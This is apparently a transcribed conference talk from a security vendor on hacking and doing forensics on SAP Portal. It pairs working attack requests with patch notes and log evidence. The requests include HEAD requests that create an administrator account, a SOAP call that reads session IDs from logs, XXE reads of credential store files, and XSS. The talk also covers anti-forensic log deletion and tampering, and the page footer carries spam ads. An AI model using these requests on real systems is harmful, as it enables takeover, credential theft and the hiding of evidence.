Invest in security to secure investments

SAP Portal: Hacking and forensics

Dmitry Chastukhin – Director of SAP pentest/research team
Evgeny Neyolov – Security analyst, (anti)forensics research
About ERPScan

•  The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
•  Leader by the number of acknowledgements from SAP (150+)
•  60+ presentations at key security conferences worldwide
•  25 awards and nominations
•  Research team - 20 experts with experience in different areas of security
•  Headquarters in Palo Alto (US) and Amsterdam (EU)
Agenda

•  SAP security
•  SAP forensics WTF?!
•  Say hello to SAP Portal
•  Breaking SAP Portal
•  Catch me if you can
•  Conclusion
SAP

•  The most popular business application
•  More than 180000 customers worldwide
•  More than 70% of Forbes 500 run SAP
•  More than 40% of ERP market in Poland
SAP security

Espionage
•  Stealing financial information
•  Stealing corporate secrets
•  Stealing supplier and customer lists
•  Stealing HR data

Fraud
•  False transactions
•  Modification of master data

Sabotage
•  Denial of service
•  Modification of financial reports
•  Access to technology network (SCADA) by trust relations
SAP security

[Chart: years 2003–2013 on the x-axis, scale 0–35]

•  BlackHat
•  Defcon
•  HITB
•  RSA
•  CONFidence
•  DeepSec
•  Hacktivity
•  Troopers
•  Source

Source: SAP Security in Figures 2013 (LINK)
Is it remotely exploitable?

5000+ non-web SAP services exposed in the world, including Dispatcher, Message server, SapHostControl, etc.

sapscan.com
SAP Security notes

[Chart: SAP Security notes by year, 2001–2014, scale 0–900]

By 2014 - 2800 SAP Security notes
What about other services?

[Chart (scale 0–9), series: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd; label: World]
What about unpublished threats?

•  Companies are not interested in publishing information about their breaches
•  There are a lot of internal breaches thanks to unnecessarily given authorizations (an employee by mistake buys hundreds of excavators instead of ten)
•  There are known stories about backdoors left by developers in custom ABAP code
•  How can you be sure that, if a breach occurs, you can find evidence?
If there are no attacks, it doesn't mean anything

•  Companies don't like to share it
•  Companies don't use security audit: ~10%
•  Even if used, nobody manages it: ~5%
•  Even if managed, no correlation: ~1%

SAP Forensics
Typical SAP audit options

•  ICM log (icm/HTTP/logging_0): 70%
•  Security audit log in ABAP: 10%
•  Table access logging (rec/client): 4%
•  Message Server log (ms/audit): 2%
•  SAP Gateway access log: 2%

* The percentage of companies is based on our security assessments and product implementations.
What do we see?

•  A lot of research
•  Real attacks
•  Lack of logging practice
•  Many vulnerabilities are hard to close → We need to monitor them, at least
What do we need to monitor?

External attacks on SAP

* Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas.

•  Attacks on users and SAP GUI: awareness
•  SAProuter: secure configuration and patch management
•  Exposed SAP services: disable them
•  SAP Portal and WEB: too many issues and custom configuration; can be 0-days; need to concentrate on this area

Say hello to Portal

•  Point of web access to SAP systems
•  Point of web access to other corporate systems
•  Way for attackers to get access to SAP from the Internet
  
EP	
  architecture	
  
16	
  
Okay,	
  okay.	
  SAP	
  Portal	
  is	
  important,	
  and	
  
it	
  has	
  many	
  links	
  to	
  other	
  modules.	
  	
  
So	
  what?	
  
17	
  
SAP Logging

"If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead)."

SOURCE: SAP HELP

*Not the only…. There are many complex attacks with POST requests.
SAP J2EE Logging

•  Categories of system events recording:
–  System: all system related security and administrative logs
–  Applications: all system events related to business logic
–  Performance: reserved for single activity tracing

•  Default location of these files in your file system:
\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log
SAP J2EE Logging

•  The developer trace files of the Java instance
<SID>\<instance name>\work
•  The developer trace files of the central services
<SID>\<instance name>\work
<SID>\<instance name>\log
•  Java server logs
<SID>\<instance name>\j2ee\cluster\server<n>\log
Full logging is not always the best option

SAP Management Console

•  SAP MMC: centralized system management
•  SAP MMC has remote commands
•  Commands are simple SOAP requests
•  Allowing to see the trace and log messages
•  It's not bad if you only use it sometimes and delete logs after use, but…

SAP Management Console
What can we find in logs?

Right! The file userinterface.log contains calculated JSESSIONID

But… The attacker must have credentials to read the log file

WRONG!

SAP Management Console
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
<enableSession>true</enableSession>
</sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
<filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
<filter/>
<language/>
<maxentries>%COUNT%</maxentries>
<statecookie>EOF</statecookie>
</ns1:ReadLogFile>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Prevention

LINK to SAP HELP

•  Don't use TRACE_LEVEL = 3
•  Delete traces when work is finished
•  Limit access to dangerous methods
•  Install notes 927637 and 1439348
•  Mask security-sensitive data in HTTP access log
Prevention

LINK to SAP HELP

•  The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
•  By default, only for the headers listed below
–  Path parameter: jsessionid
–  Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
–  HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)

SAP NetWeaver J2EE
Access Control

•  Web Dynpro: programmatic
•  Portal iViews: programmatic
•  J2EE Web apps: declarative

Programmatic: by UME
Declarative: by WEB.XML

Access Control

•  The central entity in the J2EE authorization model is the security role
•  Programmers define the application-specific roles in the J2EE deployment descriptor
web.xml / web-j2ee-engine.xml

web.xml

<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CriticalAction</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
</security-constraint>
Verb Tampering

•  If we are trying to get access to an application using GET, we need a login:pass and administrator role
•  What if we try to get access to the application using HEAD instead of GET?
•  PROFIT!
•  Did U know about ctc?
Verb Tampering

Need Admin account in SAP Portal? Just send two HEAD requests

•  Create new user CONF:idence

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence

•  Add the user CONF to the group Administrators

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators

* Works when UME uses JAVA database.
Prevention

•  Install SAP notes 1503579, 1616259, 1589525, 1624450
•  Install other SAP notes about Verb Tampering
•  Scan applications with ERPScan WEB.XML checker
•  Disable the applications that are not necessary
Investigation

[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0

j2ee\cluster\<node>\log\system\httpaccess\responses.trc
web.xml

<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CriticalAction</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
<http-method>HEAD</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
</security-constraint>
GET /admin/critical/CriticalAction
GET /servlet/com.sap.admin.Critical.Action

Invoker servlet

Invoker Servlet

•  Want to execute an OS command on J2EE server remotely?
•  Maybe upload a backdoor in a Java class?
•  Or sniff all traffic?

Still remember ctc?
Invoker Servlet

Prevention

•  Update to the latest patch: 1467771, 1445998
•  "EnableInvokerServletGlobally" must be "false"
•  Check all WEB.XML files with ERPScan WEBXML checker
Investigation

  #1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352
03#/System/Security/Audit#sap.com/
tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit
#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/
a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[
impl:
3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain#
##Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF |
| SET_ATTRIBUTE: uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420
62#/System/Security/Audit/J2EE#sap.com/
irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/
a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_
Application_Thread[impl:
3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audi
t#Java###{0}: Authorization check for caller assignment to J2EE
security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#

Investigation
XSS

•  Many XSSs in Portal
•  But sometimes HttpOnly
•  But when we exploit XSS, we can use the features of SAP Portal
EPCF

•  EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
•  Enterprise Portal Client Manager (EPCM)
•  iViews can access the EPCM object from every portal page or IFrame
•  Every iView contains the EPCM object

<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
</SCRIPT>
For example, EPCF is used as a transient user data buffer for iViews

Prevention

•  Install SAP note 1656549

Investigation

#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#

j2ee\cluster\<node>\log\system\httpaccess\responses.trc
Web Dynpro JAVA

•  Web Dynpro unauthorized modifications
•  For example:
–  somebody steals an account using XSS/CSRF/Sniffing
–  then tries to modify the severity level of logs

Web Dynpro JAVA
LINK to SAP HELP

Investigation

•  No traces of change in default log files
cluster\server0\log\system\httpaccess\responses.log
•  Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
•  But sometimes we can find information by indirect signs

[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110

•  The client loaded images from the server during some changes
Investigation

•  Most actions have icons
•  They have to be loaded from the server
•  Usually, legitimate users have them all in cache
•  Attackers usually don't have them, so they make requests to the server
•  That's how we can identify potentially malicious actions
•  But there should be correlation with a real user's activity
•  False positives are possible:
–  New legitimate user
–  Old user clears cache
–  Other
Directory traversal

FIX

Directory traversal fix bypass

Prevention

•  Install SAP note 1630293

Investigation

/../
!252f..!252f
Breaking SAP Portal

•  Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
•  Found a file in the OS of SAP Portal with keys to decrypt passwords
•  Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
•  Decrypt passwords and log into Portal
•  PROFIT!
Read the file

How can we read the file?

•  Directory Traversal
•  OS Command execution
•  XML External Entity (XXE)
XXE in Portal: Details

•  Injection of malicious requests into XML packets
•  Can lead to unauthorized file read, DoS, SSRF
•  There is an XXE vulnerability in SAP Portal
•  Can be exploited by modification of POST request
•  It is possible to read any file from OS and much more

XXE in Portal

XXE in Portal

XXE
Error based XXE

XXE in Portal: Result

•  We can read any file
•  Including config with passwords
•  The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
Where are the passwords? (config.properties)

rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u
+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv
+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/
+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u
+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u
+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
SecStore.properties
But where is the key? (config.properties)

rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
Get the password

•  We have an encrypted password
•  We have a key to decrypt it

We got the J2EE admin and JDBC login:password!
Prevention

•  Install SAP note 1619539
•  Restrict read access to files SecStore.properties and SecStore.key
Investigation
POST /irj/servlet/prt/portal/prteventname/
HtmlbEvent/prtroot/pcd!3aportal_content!
2fadministrator!2fsuper_admin!
2fsuper_admin_role!
2fcom.sap.portal.content_administration!
2fcom.sap.portal.content_admin_ws!
2fcom.sap.km.AdminContent!
2fcom.sap.km.AdminContentExplorer!
2fcom.sap.km.AdminExplorer/ HTTP/1.1
Investigation

•  The only way to get HTTP POST request values is to enable HTTP Trace
•  Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable
•  For 6.4 and 7.0 SP12 and lower:
–  On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
–  On Server: j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
•  For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
•  Manually analyze all requests for XXE attacks
Malicious file upload: Attack

•  Knowledge management allows uploading to the server different types of files that can store malicious content
•  Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
•  For example, it can be an HTML file with JavaScript that steals cookies

Malicious file upload: Attack

Malicious file upload: Attack

Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165

*Again, images can help us.
Malicious file upload: Prevention

Enable File Extension and Size Filter:

•  System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
•  Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter

Malicious file upload: Prevention
Enable Malicious Script Filter:

•  System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
•  The filter also detects executable scripts in files that are being modified and encodes them when they are saved
–  enable Forbidden Scripts: comma-separated list of banned script tags that will be encoded when the filter is applied
–  enable the Send E-Mail to Administrator option
•  Lot	
  of	
  links	
  to	
  other	
  systems	
  in	
  corporate	
  LAN	
  
•  Using	
  SSRF,	
  acackers	
  can	
  get	
  access	
  to	
  these	
  systems	
  
What	
  is	
  SSRF?	
  
75	
  
•  We	
  send	
  Packet	
  A	
  to	
  Service	
  A	
  
•  Service	
  A	
  ini=ates	
  Packet	
  B	
  to	
  service	
  B	
  
•  Services	
  can	
  be	
  on	
  the	
  same	
  or	
  different	
  hosts	
  
•  We	
  can	
  manipulate	
  some	
  fields	
  of	
  packet	
  B	
  within	
  packet	
  A	
  
•  Various	
  SSRF	
  acacks	
  depend	
  on	
  how	
  many	
  fields	
  we	
  can	
  control	
  
on	
  packet	
  B	
  
	
  
76	
  
Packet	
  A	
  
Packet	
  B	
  
SSRF History: Basics

[Diagram: HTTP Server in front of the Corporate network. Direct attack: GET /vuln.jsp to the HTTP server. SSRF attack: request to A, which sends GET /vuln.jsp to B inside the corporate network.]

Partial Remote SSRF: HTTP attacks on other services
Gopher uri scheme

•  Using gopher:// uri scheme, it is possible to send TCP packets
–  Exploit OS vulnerabilities
–  Exploit old SAP application vulnerabilities
–  Bypass SAP security restrictions
–  Exploit vulnerabilities in local services

More info in our BH2012 presentation: SSRF vs. Business Critical Applications (LINK)
Portal post-exploitation

Anti-forensics

Anti-forensics

•  Flooding
•  Deleting
•  Changing
Anti-forensics

Log flooding

•  5 active logs
•  Maximum log file size is 10 MB
•  Archiving when all logs reach the maximum size
•  If file.0.log -> max size then open file.1.log
•  If file.4.log -> max size then zip all and backup
•  Rewriting the same files after archiving
Anti-forensics

Log deleting

•  SAP locks write access to only the one active log
•  SAP allows reading/writing logs, so it is possible to delete them
•  It could compromise the attacker's presence

Log changing

•  SAP locks write access only to the one active log
•  It is possible to write into any other log file
Securing SAP Portal

•  Patching
•  Secure configuration
•  Enabling HTTP Trace with masking
•  Malicious script filter
•  Log archiving
•  Additional place for log storage
•  Monitoring of security events
–  Own scripts, parse common patterns
–  ERPScan has all existing web vulns/0-day patterns
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure

SAP guides

It's all in your hands

Regular security assessments
ABAP code review
Monitoring technical security
Segregation of duties
Conclusion

I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:

July 31 – BlackHat (Las Vegas, USA)
Future work

Web: www.erpscan.com
e-mail: info@erpscan.com
Twitter: @erpscan, @_chipik, @neyolov

A Holistic View on SAP Security Why Securing Production Systems Is Not Enough
 
Attacks Based on Security Configurations
Attacks Based on Security ConfigurationsAttacks Based on Security Configurations
Attacks Based on Security Configurations
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 
Preventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based DeploymentsPreventing Vulnerabilities in SAP HANA based Deployments
Preventing Vulnerabilities in SAP HANA based Deployments
 
Open APIs Design
Open APIs DesignOpen APIs Design
Open APIs Design
 
Netherlands Tech Tour - 06 MySQL Enterprise Monitor
Netherlands Tech Tour - 06 MySQL Enterprise MonitorNetherlands Tech Tour - 06 MySQL Enterprise Monitor
Netherlands Tech Tour - 06 MySQL Enterprise Monitor
 
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
How Pratt & Whitney Streamlined Their ABAP Security and Quality Code Review P...
 
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoftAlexey Tyurin - HR Hacking — bugs in PeopleSoft
Alexey Tyurin - HR Hacking — bugs in PeopleSoft
 

Andere mochten auch

Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
ERPScan
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
ERPScan
 

Andere mochten auch (13)

Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
 
Forgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application SystemsForgotten world - Corporate Business Application Systems
Forgotten world - Corporate Business Application Systems
 
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERPBusiness breakdown vulnerabilities in ERP via ICS and ICS via ERP
Business breakdown vulnerabilities in ERP via ICS and ICS via ERP
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
 
Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)Practical SAP pentesting (B-Sides San Paulo)
Practical SAP pentesting (B-Sides San Paulo)
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)Practical SAP pentesting workshop (NullCon Goa)
Practical SAP pentesting workshop (NullCon Goa)
 
Implementing SAP security in 5 steps
Implementing SAP security in 5 stepsImplementing SAP security in 5 steps
Implementing SAP security in 5 steps
 

Ähnlich wie SAP portal: breaking and forensicating

SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
Positive Hack Days
 
01 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv101 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv1
Ivan Ma
 

Ähnlich wie SAP portal: breaking and forensicating (20)

SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
SAP security in figures
SAP security in figuresSAP security in figures
SAP security in figures
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
 
Attacking SAP users with sapsploit
Attacking SAP users with sapsploit Attacking SAP users with sapsploit
Attacking SAP users with sapsploit
 
01 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv101 demystifying mysq-lfororacledbaanddeveloperv1
01 demystifying mysq-lfororacledbaanddeveloperv1
 
How to manage and monitor large sql server estates
How to manage and monitor large sql server estatesHow to manage and monitor large sql server estates
How to manage and monitor large sql server estates
 
Onapsis SAP Backdoors
Onapsis SAP BackdoorsOnapsis SAP Backdoors
Onapsis SAP Backdoors
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
OUTSYSTEMS AND SAP 2015
OUTSYSTEMS AND SAP 2015OUTSYSTEMS AND SAP 2015
OUTSYSTEMS AND SAP 2015
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
 
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution ManagerInception of the SAP Platform's Brain: Attacks on SAP Solution Manager
Inception of the SAP Platform's Brain: Attacks on SAP Solution Manager
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
 
RPA Webinar Wise Men Solutions
RPA Webinar  Wise Men SolutionsRPA Webinar  Wise Men Solutions
RPA Webinar Wise Men Solutions
 
CON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptx
CON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptxCON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptx
CON5451_Brydon-OOW2014_Brydon_CON5451 (1).pptx
 
Flopsar tesacom-technical-introduction v1a-eng
Flopsar tesacom-technical-introduction v1a-engFlopsar tesacom-technical-introduction v1a-eng
Flopsar tesacom-technical-introduction v1a-eng
 

Kürzlich hochgeladen

Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
VictoriaMetrics
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 

Kürzlich hochgeladen (20)

Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
Large-scale Logging Made Easy: Meetup at Deutsche Bank 2024
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare%in Harare+277-882-255-28 abortion pills for sale in Harare
%in Harare+277-882-255-28 abortion pills for sale in Harare
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
